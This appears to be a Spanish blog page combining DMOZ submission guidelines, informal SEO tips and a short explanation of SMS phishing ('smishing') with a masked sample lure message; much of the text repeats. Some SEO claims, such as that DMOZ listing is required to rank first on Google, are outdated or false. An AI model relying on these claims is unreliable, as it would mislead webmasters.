Por favor, comprenda que hacer del ODP un recurso valioso, requiere que apliquemos nuestro criterio editorial para determinar el contenido y la estructura del directorio. Ese criterio se extiende (pero no se limita) a qué sitios incluir, dónde se colocan los sitios dentro del directorio, cuándo y si procede incluir más de un enlace a un sitio, cuándo son apropiados los enlaces profundos y el contenido del título y la descripción del sitio. Además, la situación de un sitio en el directorio es susceptible de ser modificada y borrado en cualquier momento a nuestro único criterio. No debería dar por supuesto que un sitio será incluido en el directorio. Por favor, comprenda que al aplicar el criterio de edición puede que no se trate por igual a todos los envíos. Puede que no coincida siempre con nuestras decisiones, pero esperamos que se dé cuenta de que hacemos todo lo que podemos para tomar decisiones justas y razonables.
El equipo del Open Directory agradece comentarios y observaciones sobre el directorio en general. Por favor muéstrenos su opinión y cómo podemos mejorar el servicio. Muchas gracias.
Vaya a la página inicial del Open Directory en dmoz.org - comience aquí la búsqueda de la categoría a la que realizar su envío.
¿Cuánto tiempo tarda mi sitio en ser listado?
Dependiendo del nivel de actividad de los editores en su área, pueden pasar dos semanas o más hasta que su sitio sea revisado. Aunque el ámbito y la cobertura del directorio sean tan extensos, tenemos muy en cuenta la calidad de ODP y estamos orgullosos de ser muy selectivos. No aceptamos todos los sitios, por lo tanto, si el suyo no es aceptado, por favor no se lo tome como algo personal. Nuestra meta es hacer un directorio tan útil como sea posible para nuestros usuarios, no servir como herramienta promocional para las entidades listadas ni incluir en el directorio todas, ni siquiera la mayoría de las páginas que posiblemente podrían ser listadas.
¿Tiene el ODP un servicio urgente que permita que mi página sea listada en menos tiempo?
El ODP no tiene un servicio urgente similar a otros directorios comerciales, sin embargo, hay varias cosas que puede hacer para ayudar a que la revisión de su solicitud sea rápida. Primero, siga cuidadosamente las normas de envío.
Segundo, debería revisar algunas de las políticas editoriales que usamos para listar los sitios. Una solicitud bien escrita y meditada tiene más posibilidades de ser revisada antes que una descuidada.
Sin embargo, no recomendamos sugerir un sitio en varias categorías distintas con la esperanza de que acabe siendo listada en una o dos de ellas. Con esto, no conseguirá que Web sea listada antes, de hecho puede retrasar significativamente el proceso. Esto puede ser interpretado como spam y que al final su sitio no sea listado.
¿Cómo consigo que listen mi sitio en más de una categoría?
Debería sugerir su sitio a una única categoría, la que considere más apropiada con sus contenidos. Por favor, sugiera su página una sola vez. Los editores de ODP se reservan el derecho de determinar en qué categoría o categorías será colocado su sitio utilizando su criterio editorial.
¿Cuánto tiempo tarda en aparecer mi sitio en los motores de búsqueda que usan los datos de ODP como AOL Search y Netscape Search?
Una vez que su sitio ha sido listado en ODP, puede tardar dos semanas o más en aparecer en los motores de búsqueda que utilizan los datos de ODP. Es responsabilidad de esos buscadores utilizar la última versión de nuestros datos. ODP no tiene ningún control sobre cuándo terceras partes actualizan los datos provenientes de ODP.
¿A quién le pido ayuda sobre mi sitio y sobre la categoría más apropiada para que sea listado?
Si después de explorar el enorme árbol de categorías, todavía no está seguro de dónde debería enviar su sitio, la mejor opción es sugerirlo en la categoría que piense que mejor refleja sus contenidos. Los editores tienen la capacidad de mover su sitio a otra categoría diferente o de crear una nueva si hiciera falta.
¿Qué debería hacer si la categoría a la que quiero enviar mi página no tiene un enlace "Agregar URL"?
Unas pocas categorías tienen deshabilitado el enlace "Agregar URL" y no aceptan envíos ni listan sitios. Debería encontrar otra más específica explorando las subcategorías.
Url amigables
Esto va enfocado a sitios dinámicos
¿Que es un Web dinámica y una estática?
-Web estática
muestra el mismo contenido siempre, para agregar contenido se tiene que modificar la Web a veces por completo aunque con el CSS se pueden hacer grandes logros
-Web dinámica
son creadas según al que te visita en la mayoría de los casos se necesita base de datos recupera la información dependiendo ( en realidad las web no están hasta q alguien las visita ) la creación de paginas es mas fácil rápido tiene mas recursos que puedes lograr
¿Cual de las dos es mejor?
La estática según he leído se indexa mejor que la dinámica por que a google no le gustan los parámetros o 'sessID' o 'sessionID' ejemplo web.php?parametro5=7¶metro2
los ? = & no le gustan y no te indexara y si lo llegara a indexar no te posicionara por q al buscar
google se basa en url, titulo , contenido y link q apuntan hacia tu web (las metas actualmente no son necesarias pero no esta de mas ponerlas bien)
¿Dinamica es la mejor pero si no te indexa que se puede hacer ?
path info o mod_rewrite en realidad son parecidas pero el mod_rewrite es mas flexible
mod_rewrite
para su uso necesitas servidor Apache con el módulo mod_rewrite activado y permitido el uso de .htaccess
ejemplo tenemos
http://tuweb.com/tipo=buscadores&google=googlebot
seria
http://tuweb.com/buscadores/google/googlebot.html
en próximos se hará mas extenso este tema de mod_rewrite
Sitemaps
Un buen sitemaps es siempre muy bueno tenerlo ya que con esta herramienta google te indexa mas rápido tu contenido fresco
http://www.google.com/webmasters/sitemaps/?hl=es
Page rank y conseguir quien te enlace
Esta creado por los fundadores google es un valor numérico que va de 0 a 10
conforme mas pagerank mas difícil es subirlo
cuando alguien te linkea de la forma adecuada es como dar votos hacia tu Web.
pero es mejor que no te linke aquellas webs que están penalizadas por google (baneadas)
eso te perjudica también alguna q contenga demasiados enlaces hacia a otras webs
el pagerank lo puedes ver bajándote la barra google y en algunos sitios
y como deberían ser los links a continuación
Manejo correcto de los links
La mejor forma de poner los links es link de texto ejemplo
Código:
quiero a google
seguramente le has dado en cache a busqueda en google algunas veces solo aparece solo se encontraron términos q apuntan hacia esta pagina
Herramientas google
El mismo google te da herramientas para lograr una buena indexación
Asistente informativo sobre el estado del sitio
Descubra si su sitio forma parte ya del índice de Google.
Blog de Google destinado a webmasters (inglés)
Las últimas novedades y las noticias más recientes relacionadas con los sistemas de rastreo e indexación de sitios web utilizados por Google.
Herramientas para webmasters (incluido Sitemaps)
Estadísticas, diagnósticos y administración de los procesos de rastreo e indexación que realiza Google de su sitio web, incluidas funciones como el envío de Sitemaps y la generación de informes.
Foro de debate de Google para webmasters
Entable conversación con otros webmasters y comparta sus ideas con nosotros.
Envíe contenido a Google
Descubra los métodos para enviar contenido a distintos servicios de Google, como Google Base y Google Libros.
Centro de Asistencia para webmasters
Consulte las respuestas a las preguntas más frecuentes formuladas acerca del rastreo, la indexación, la clasificación y otros muchos temas.
todo ello aquí
http://www.google.com.mx/intl/es/webmasters/
mas capítulos posteriormente como robots.txt cuanto es lo máximo que debe pesar tu Web que no contenga errores como te puede penalizar y mas …
By XD (DJChileOut) Saludos!!!!! Flameb
Dar de alta en google y en otros
Aunque google no asegura que tu url la va a indexar mándala varias veces no te penaliza ni nada, también es importante darla de alta en otros buscadores aunque es cierto que q la mayoría usa google no esta de mas también inscribirlo en otros:
http://www.google.com/intl/es/addurl.html
msn
http://search.msn.com/docs/submit.aspx
yahoo altavista
http://es.altavista.com/addurl/default
DMOZ : Open Directory Project
DMOZ : Open Directory Project , ODP , o algunos le llaman directory de mozilla.
Para aparecer en los primeros lugares en google tienes que estar en ese directorio porque es donde se basa para listar las Webs
Intenta inscribirte realmente es difícil pero si lo consigues será un grande logro
¿nada mas google? no la mayoría AOL Search, Lycos, HotBot, DirectHit y otros cientos más
Dmoz.org
Es un directorio de webs creado por Netscape y AOL se divide en idiomas países categorías se basa en usuarios editores como la Wiki puedes entrar como editor pero no es necesario para que te agreguen tu Web al ser como la wiki existen parecidos problemas editores malos etc.
DMOZ es gratis y no lo confundas no es buscador aunque tiene uno pero solo es interno
es un directorio y es totalmente gratis aparecen sitios basura en DMOZ pero porque lleva varios años online desde 1998
Recomendaciones de tu Web
tiene que estar bien hecha no la clásica que parece geocities de hace 15 años no un myspaces spacelive tener dominio propio Web terminada:
Ejemplo no próximamente y que algunos link están muertos tu Web tiene q estar bien hecha accesible y no confusa para tus visitantes
si esta hecha con algún script prefabricado dejarle los créditos sin faltas de ortografía sugiérelo en la categoría correcta si algún sitio de tu competencia (temática) esta ve que categoría es y ahí inscribe tu Web no la mandes varias veces por que los editores se molestan y no la mandas en cada categoría mándala en una y los editores si ven que podría tener doble triple etc. la pondrán existen rumores que algunos editores cobran por aceptarte la Web si detectas algún abuso en el DMOZ Escribe en http://dmoz.org/cgi-bin/feedback.cgi
Como sugerir un sitio a DMOZ
fuente:http://www.dmoz.org
Paso1
¿Cómo agrego un sitio al Open Directory Project?
Agregar un sitio es fácil. Simplemente siga estas instrucciones.
Cómo sugerir un sitio a Open Directory
* No envíe sitios espejo. Sitios espejo son aquellos que tienen un contenido idéntico pero con URLs distintos.
* No envíe URLs que contengan únicamente el mismo o similar contenido que otros sitios que puedan estar listados en el directorio. Sitios con contenido coincidente y repetitivo no son útiles para los usuarios del directorio. Múltiples envíos del mismo sitio o de sitios relacionados puede producir que sean excluidos y/o borrados estos sitios y todos sus afiliados.
* No disfrace sus envíos para sugerir el mismo URL más de una vez.
Ejemplo:
http://www.dmoz.org
http://www.dmoz.org/index.html
* No envíe ningún sitio con una URL que redireccione a otra distinta.
* El Open Directory tiene una política contra la inclusión de sitios con contenido ilegal. Ejemplos de material ilegal incluyen pornografía infantil, difamación, materiales que infrinjan algún derecho de la propiedad intelectual y material que específicamente apoye, solicite o ampare actividades ilegales (como el fraude o la violencia).
* No envíe sitios "En construcción". Espere hasta que el sitio esté terminado antes de enviarlo. Sitios incompletos, con avisos "En construcción" o que contengan gráficos o enlaces rotos no son buenos candidatos para el directorio.
* Envíe los sitios de pornografía a la categoría apropiada dentro de Adult.
* Envíe los que no están en inglés a la categoría apropiada dentro de World.
* No envíe sitios compuestos mayoritariamente por enlaces afiliados.
Paso 2
Realice una búsqueda rápida en el directorio en dmoz.org para asegurarse de que su sitio no está ya incluido. De esta forma todos ahorraremos tiempo.
Paso 3
Identifique la categoría (una sola) que mejor defina su sitio. El Open Directory posee una enorme variedad de temas entre los que elegir. Deber enviar su sitio a una única categoría, la que sea más relevante. Los sitios enviados a categorías inapropiadas o no relacionadas pueden ser rechazados o eliminados.
Nota: algunas categorías no ofrecen los enlaces "Sugerir URL" o "Actualizar URL". Estas categorías no aceptan envíos, por lo tanto debería encontrar una categoría más específica para su sitio.
Paso 4
Una vez que ha seleccionado la mejor categoría para su sitio, vaya directamente a esa categoría en dmoz.org y entonces utilice "Sugerir URL". Siga las instrucciones del formulario de envío cuidadosamente. La descripción debería informar del contenido del sitio de forma concisa y precisa. No deben ser de naturaleza promocional.
Enviar una descripción promocional en vez de una objetiva y bien escrita puede retrasar significativamente el listado de su sitio o impedir totalmente que sea listado.
El software para el envío automático de sitios es (y siempre ha sido) una violación de este proceso. Los sitios enviados automáticamente son marcados y después de aceptarse el envío, borrados sin notificárselo. Los envíos automatizados enviados de forma persistente nos obligarán a excluirle de dmoz, así podremos ofrecer los recursos a personas reales.
Un editor de ODP revisará su envío para determinar si se incluirá en el directorio. En función de distintos factores como el volumen de envíos a una categoría en particular, puede llevar hasta varias semanas o más antes de que su envío sea revisado. Por favor envíe cada URL al Open Directory una sola vez. Le repetimos que el envío reiterado del mismo o de sitios relacionados puede conllevar la exclusión y/o eliminación de ésos y todos los sitios afiliados.
Disfrazar su envío y sugerir la misma URL más de una vez no está permitido.
Actualizar su sitio
Si un sitio ha sido aceptado en el directorio pero no está satisfecho con la descripción o el título del sitio, puede ir a la categoría donde está listado y rellenar el formulario "actualizar URL". Si no está satisfecho con la categoría donde su sitio está listado, puede enviar un email a un editor de la categoría explicando su desacuerdo. Sea civilizado y educado, los comportamientos amenazadores u ofensivos no serán tolerados.
Si (y sólo si) no está de acuerdo con la respuesta del editor, puede usar el enlace "reportar abuso/spam" en la parte superior de la página para recurrir la decisión del editor. Sea concreto con respecto a su desacuerdo (incluyendo por qué piensa que la respuesta del editor es inadecuada). Los comentarios realizados por medio del enlace "reportar abuso/spam" son revisados por el staff del ODP, que tomará la decisión final. Por favor, NO envíe mensajes a Netscape, eso sólo retrasará y complicará el proceso. Nos tomamos muy en serio las observaciones y les prestamos gran atención. Pero recuerde que debemos mantener nuestro criterio y realizar numerosos juicios sobre cómo hacer el ODP tan útil como sea posible, independientemente de la decisión que tomemos, no conseguiremos satisfacer siempre a todos.
Posicionando su sitio en portales y motores de búsqueda que utilizan los datos del ODP
Si su sitio ha sido aceptado en el Open Directory, puede tardar de dos semanas a varios meses en ser listado en los sitios que utilizan los datos del ODP, como por ejemplo AOL Search, Google, Netscape Search, Yahoo Search, y otros cientos de sitios. Actualizamos los datos disponibles semanalmente, pero cada uno de estos sitios tiene su propio calendario de actualizaciones.
Criterio editorial
Procedimiento una vez que ha sugerido su sitio
Por favor, comprenda que hacer del ODP un recurso valioso, requiere que apliquemos nuestro criterio editorial para determinar el contenido y la estructura del directorio. Ese criterio se extiende (pero no se limita) a qué sitios incluir, dónde se colocan los sitios dentro del directorio, cuándo y si procede incluir más de un enlace a un sitio, cuándo son apropiados los enlaces profundos y el contenido del título y la descripción del sitio. Además, la situación de un sitio en el directorio es susceptible de ser modificada y borrado en cualquier momento a nuestro único criterio. No debería dar por supuesto que un sitio será incluido en el directorio. Por favor, comprenda que al aplicar el criterio de edición puede que no se trate por igual a todos los envíos. Puede que no coincida siempre con nuestras decisiones, pero esperamos que se dé cuenta de que hacemos todo lo que podemos para tomar decisiones justas y razonables.
El equipo del Open Directory agradece comentarios y observaciones sobre el directorio en general. Por favor muéstrenos su opinión y cómo podemos mejorar el servicio. Muchas gracias.
Vaya a la página inicial del Open Directory en dmoz.org - comience aquí la búsqueda de la categoría a la que realizar su envío.
¿Cuánto tiempo tarda mi sitio en ser listado?
Dependiendo del nivel de actividad de los editores en su área, pueden pasar dos semanas o más hasta que su sitio sea revisado. Aunque el ámbito y la cobertura del directorio sean tan extensos, tenemos muy en cuenta la calidad de ODP y estamos orgullosos de ser muy selectivos. No aceptamos todos los sitios, por lo tanto, si el suyo no es aceptado, por favor no se lo tome como algo personal. Nuestra meta es hacer un directorio tan útil como sea posible para nuestros usuarios, no servir como herramienta promocional para las entidades listadas ni incluir en el directorio todas, ni siquiera la mayoría de las páginas que posiblemente podrían ser listadas.
¿Tiene el ODP un servicio urgente que permita que mi página sea listada en menos tiempo?
El ODP no tiene un servicio urgente similar a otros directorios comerciales, sin embargo, hay varias cosas que puede hacer para ayudar a que la revisión de su solicitud sea rápida. Primero, siga cuidadosamente las normas de envío.
Segundo, debería revisar algunas de las políticas editoriales que usamos para listar los sitios. Una solicitud bien escrita y meditada tiene más posibilidades de ser revisada antes que una descuidada.
Sin embargo, no recomendamos sugerir un sitio en varias categorías distintas con la esperanza de que acabe siendo listada en una o dos de ellas. Con esto, no conseguirá que Web sea listada antes, de hecho puede retrasar significativamente el proceso. Esto puede ser interpretado como spam y que al final su sitio no sea listado.
¿Cómo consigo que listen mi sitio en más de una categoría?
Debería sugerir su sitio a una única categoría, la que considere más apropiada con sus contenidos. Por favor, sugiera su página una sola vez. Los editores de ODP se reservan el derecho de determinar en qué categoría o categorías será colocado su sitio utilizando su criterio editorial.
¿Cuánto tiempo tarda en aparecer mi sitio en los motores de búsqueda que usan los datos de ODP como AOL Search y Netscape Search?
Una vez que su sitio ha sido listado en ODP, puede tardar dos semanas o más en aparecer en los motores de búsqueda que utilizan los datos de ODP. Es responsabilidad de esos buscadores utilizar la última versión de nuestros datos. ODP no tiene ningún control sobre cuándo terceras partes actualizan los datos provenientes de ODP.
¿A quién le pido ayuda sobre mi sitio y sobre la categoría más apropiada para que sea listado?
Si después de explorar el enorme árbol de categorías, todavía no está seguro de dónde debería enviar su sitio, la mejor opción es sugerirlo en la categoría que piense que mejor refleja sus contenidos. Los editores tienen la capacidad de mover su sitio a otra categoría diferente o de crear una nueva si hiciera falta.
¿Qué debería hacer si la categoría a la que quiero enviar mi página no tiene un enlace "Agregar URL"?
Unas pocas categorías tienen deshabilitado el enlace "Agregar URL" y no aceptan envíos ni listan sitios. Debería encontrar otra más específica explorando las subcategorías.
Url amigables
Esto va enfocado a sitios dinámicos
¿Que es un Web dinámica y una estática?
-Web estática
muestra el mismo contenido siempre, para agregar contenido se tiene que modificar la Web a veces por completo aunque con el CSS se pueden hacer grandes logros
-Web dinámica
son creadas según al que te visita en la mayoría de los casos se necesita base de datos recupera la información dependiendo ( en realidad las web no están hasta q alguien las visita ) la creación de paginas es mas fácil rápido tiene mas recursos que puedes lograr
¿Cual de las dos es mejor?
La estática según he leído se indexa mejor que la dinámica por que a google no le gustan los parámetros o 'sessID' o 'sessionID' ejemplo web.php?parametro5=7¶metro2
los ? = & no le gustan y no te indexara y si lo llegara a indexar no te posicionara por q al buscar
google se basa en url, titulo , contenido y link q apuntan hacia tu web (las metas actualmente no son necesarias pero no esta de mas ponerlas bien)
¿Dinamica es la mejor pero si no te indexa que se puede hacer ?
path info o mod_rewrite en realidad son parecidas pero el mod_rewrite es mas flexible
mod_rewrite
para su uso necesitas servidor Apache con el módulo mod_rewrite activado y permitido el uso de .htaccess
ejemplo tenemos
http://tuweb.com/tipo=buscadores&google=googlebot
seria
http://tuweb.com/buscadores/google/googlebot.html
en próximos se hará mas extenso este tema de mod_rewrite
Sitemaps
Un buen sitemaps es siempre muy bueno tenerlo ya que con esta herramienta google te indexa mas rápido tu contenido fresco
http://www.google.com/webmasters/sitemaps/?hl=es
Page rank y conseguir quien te enlace
Esta creado por los fundadores google es un valor numérico que va de 0 a 10
conforme mas pagerank mas difícil es subirlo
cuando alguien te linkea de la forma adecuada es como dar votos hacia tu Web.
pero es mejor que no te linke aquellas webs que están penalizadas por google (baneadas)
eso te perjudica también alguna q contenga demasiados enlaces hacia a otras webs
el pagerank lo puedes ver bajándote la barra google y en algunos sitios
y como deberían ser los links a continuación
Manejo correcto de los links
La mejor forma de poner los links es link de texto ejemplo
Código:
quiero a google
seguramente le has dado en cache a busqueda en google algunas veces solo aparece solo se encontraron términos q apuntan hacia esta pagina
Herramientas google
El mismo google te da herramientas para lograr una buena indexación
Asistente informativo sobre el estado del sitio
Descubra si su sitio forma parte ya del índice de Google.
Blog de Google destinado a webmasters (inglés)
Las últimas novedades y las noticias más recientes relacionadas con los sistemas de rastreo e indexación de sitios web utilizados por Google.
Herramientas para webmasters (incluido Sitemaps)
Estadísticas, diagnósticos y administración de los procesos de rastreo e indexación que realiza Google de su sitio web, incluidas funciones como el envío de Sitemaps y la generación de informes.
Foro de debate de Google para webmasters
Entable conversación con otros webmasters y comparta sus ideas con nosotros.
Envíe contenido a Google
Descubra los métodos para enviar contenido a distintos servicios de Google, como Google Base y Google Libros.
Centro de Asistencia para webmasters
Consulte las respuestas a las preguntas más frecuentes formuladas acerca del rastreo, la indexación, la clasificación y otros muchos temas.
todo ello aquí
http://www.google.com.mx/intl/es/webmasters/
mas capítulos posteriormente como robots.txt cuanto es lo máximo que debe pesar tu Web que no contenga errores como te puede penalizar y mas …
By XD (DJChileOut) Saludos!!!!! Flameb
Smishing ummmm a k sabe eso ajajaj xD
Es más un fraude de 'phishing' enviado a través de mensajes SMS.
Los delincuentes tecnológicos utilizan una nueva táctica enviando mensajes de texto en los que se simula provienen de empresas web conocidas.
"El 'phishing' tiene impacto los consumidores y tiene impacto sobre la seguridad general de Internet y esto daña a las empresas.
Cómo funciona
El sistema emisor de estos mensajes de texto o incluso un individuo el cual suele ser un spammer; intentará sumplantar la identidad de alguna persona conocida entre nuestros contactos o incluso una empresa de confianza.
Las víctimas de Smishing reciben mensajes SMS con líneas similares a estás: "Estamos confirmando que se ha dado de alta para un servicio de citas. Se le cobrará 2 dólares al día a menos que cancele su petición: www.?????.com."
Cuando visitamos la dirección web, las víctimas son incitados o incluso forzados a descargar algún programa que en su mayoría suele ser un Troyano.
Waaa
Los delincuentes tecnológicos utilizan una nueva táctica enviando mensajes de texto en los que se simula provienen de empresas web conocidas.
"El 'phishing' tiene impacto los consumidores y tiene impacto sobre la seguridad general de Internet y esto daña a las empresas.
Cómo funciona
El sistema emisor de estos mensajes de texto o incluso un individuo el cual suele ser un spammer; intentará sumplantar la identidad de alguna persona conocida entre nuestros contactos o incluso una empresa de confianza.
Las víctimas de Smishing reciben mensajes SMS con líneas similares a estás: "Estamos confirmando que se ha dado de alta para un servicio de citas. Se le cobrará 2 dólares al día a menos que cancele su petición: www.?????.com."
Cuando visitamos la dirección web, las víctimas son incitados o incluso forzados a descargar algún programa que en su mayoría suele ser un Troyano.
Waaa
Suscribirse a:
Entradas (Atom)